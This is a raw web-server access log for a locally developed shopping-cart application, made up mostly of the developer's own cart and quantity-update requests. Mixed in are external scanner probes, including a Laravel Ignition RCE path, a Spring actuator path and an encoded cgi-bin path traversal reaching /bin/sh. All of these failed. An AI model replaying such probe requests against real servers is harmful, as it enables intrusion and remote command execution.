0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:15 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:16 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:17 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5252 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:17 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:21 +0800] "GET /eswz/updateQuantity?goodsid=9&quantity=3 HTTP/1.1" 302 - http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:21 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:21 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:29 +0800] "GET /eswz/updateQuantity?goodsid=9&quantity=6 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:29 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:29 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:32 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:32 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:32 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:38 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=45 HTTP/1.1" 302 - http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:38 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:38 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:44:52 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=6 HTTP/1.1" 302 - http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:44:52 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-1 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:44:52 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:44:55 +0800] "GET /eswz/deleteGoods?goodsid=9 HTTP/1.1" 302 - http-bio-8080-exec-1 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:44:55 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4800 http-bio-8080-exec-1 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:44:55 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 16
64.62.197.150 - - [20/Nov/2022:15:44:57 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-8 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:44:58 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-1 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:00 +0800] "GET /eswz/detailGoods?goodsid=7 HTTP/1.1" 200 4901 http-bio-8080-exec-1 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:00 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:01 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:02 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-1 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:04 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5252 http-bio-8080-exec-1 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:04 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:12 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:12 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-1 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:45:12 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 19
152.89.196.211 - - [20/Nov/2022:15:45:50 +0800] "GET /console/ HTTP/1.1" 404 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:33 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-9 672
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:33 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:35 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=1 HTTP/1.1" 302 - http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:35 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:35 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:39 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=66 HTTP/1.1" 302 - http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:39 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:39 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:42 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=6 HTTP/1.1" 302 - http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:42 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:44 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=36 HTTP/1.1" 302 - http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:44 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:44 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:59 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-9 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:59 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:47:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 16
152.89.196.211 - - [20/Nov/2022:15:48:05 +0800] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 - http-bio-8080-exec-10 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:49:46 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5191 http-bio-8080-exec-8 123
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:49:46 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-8 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:51:42 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-5 95
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:51:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:51:44 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:51:44 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-5 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:51:44 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:24 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:24 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 39
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:24 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 540
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:27 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:32 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:33 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:35 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:35 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:45 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=9 HTTP/1.1" 302 - http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:45 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:45 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:53 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:53 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5239 http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:52:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 17
152.89.196.211 - - [20/Nov/2022:15:53:34 +0800] "GET /_ignition/execute-solution HTTP/1.1" 404 - http-bio-8080-exec-8 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:14 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-9 606
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:14 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:18 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=9 HTTP/1.1" 302 - http-bio-8080-exec-9 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:18 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-9 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:19 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:41 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity=3 HTTP/1.1" 302 - http-bio-8080-exec-9 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:41 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-9 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:54:41 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 20
152.89.196.211 - - [20/Nov/2022:15:54:55 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-3 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:55:38 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5257 http-bio-8080-exec-9 114
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:55:38 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:55:40 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-9 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:55:40 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5257 http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:55:40 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:57:24 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5255 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:57:24 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 17
152.89.196.211 - - [20/Nov/2022:15:57:36 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-6 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:57:37 +0800] "GET /eswz/updateQuantity?goodsid=7&&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:57:37 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5257 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:57:37 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:58:56 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5230 http-bio-8080-exec-4 120
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:58:56 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:58:59 +0800] "GET /eswz/updateQuantity?goodsid=7&&quantity=7 HTTP/1.1" 302 - http-bio-8080-exec-4 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:58:59 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5230 http-bio-8080-exec-4 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:58:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:00 +0800] "GET /eswz/updateQuantity?goodsid=7&&quantity=7 HTTP/1.1" 302 - http-bio-8080-exec-4 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:00 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5230 http-bio-8080-exec-4 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:00 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:03 +0800] "GET /eswz/updateQuantity?goodsid=7&&quantity=7 HTTP/1.1" 302 - http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:03 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5230 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:03 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:09 +0800] "GET /eswz/deleteGoods?goodsid=7 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:09 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4784 http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:09 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:11 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:13 +0800] "GET /eswz/detailGoods?goodsid=9 HTTP/1.1" 200 5278 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:13 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:14 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:15 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:16 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5229 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:16 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:19 +0800] "GET /eswz/updateQuantity?goodsid=9&&quantity=1 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:19 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5230 http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:19 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:40 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5185 http-bio-8080-exec-10 109
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:59:40 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:00:35 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5182 http-bio-8080-exec-10 75
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:00:35 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:00:47 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5182 http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:00:47 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 16
152.89.196.211 - - [20/Nov/2022:16:01:27 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:03:16 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5245 http-bio-8080-exec-1 100
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:03:16 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 31
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:03:25 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5245 http-bio-8080-exec-1 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:03:25 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 15
152.89.196.211 - - [20/Nov/2022:16:06:23 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-3 0
152.89.196.211 - - [20/Nov/2022:16:08:33 +0800] "GET /actuator/gateway/routes HTTP/1.1" 404 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:10:10 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6283 http-bio-8080-exec-1 1208
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:10:58 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4397 http-bio-8080-exec-2 114
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:10:58 +0800] "GET /eswz/index.css HTTP/1.1" 200 16260 http-bio-8080-exec-4 127
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:11:00 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=3 HTTP/1.1" 500 4079 http-bio-8080-exec-5 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:00 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-6 39
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:01 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-8 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:09 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-9 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:10 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:12 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:12 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:15 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=3 HTTP/1.1" 302 - http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:15 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:15 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:29 +0800] "GET /eswz/updateQuantity?goodsid=4&&quantity=7 HTTP/1.1" 302 - http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:29 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5254 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:29 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:57 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5227 http-bio-8080-exec-10 408
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:12:57 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 37
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:13:00 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:13:00 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5227 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:13:00 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-6 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:32 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 81
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:32 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:36 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=23 HTTP/1.1" 302 - http-bio-8080-exec-9 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:36 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:36 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 16
80.94.92.40 - - [20/Nov/2022:16:15:40 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-8 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:42 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=12 HTTP/1.1" 302 - http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:42 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:45 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:45 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:45 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:46 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=3 HTTP/1.1" 302 - http-bio-8080-exec-9 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:46 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:46 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:47 +0800] "GET /eswz/updateQuantity?goodsid=4&&quantity=3 HTTP/1.1" 302 - http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:47 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:47 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:48 +0800] "GET /eswz/updateQuantity?goodsid=9&&quantity=3 HTTP/1.1" 302 - http-bio-8080-exec-9 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:48 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:15:48 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:16:16 +0800] "GET /eswz/updateQuantity?goodsid=9&&quantity=9989080 HTTP/1.1" 302 - http-bio-8080-exec-9 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:16:16 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5281 http-bio-8080-exec-9 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:16:16 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:20:53 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-3 88
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:20:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-3 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:20:57 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-6 10
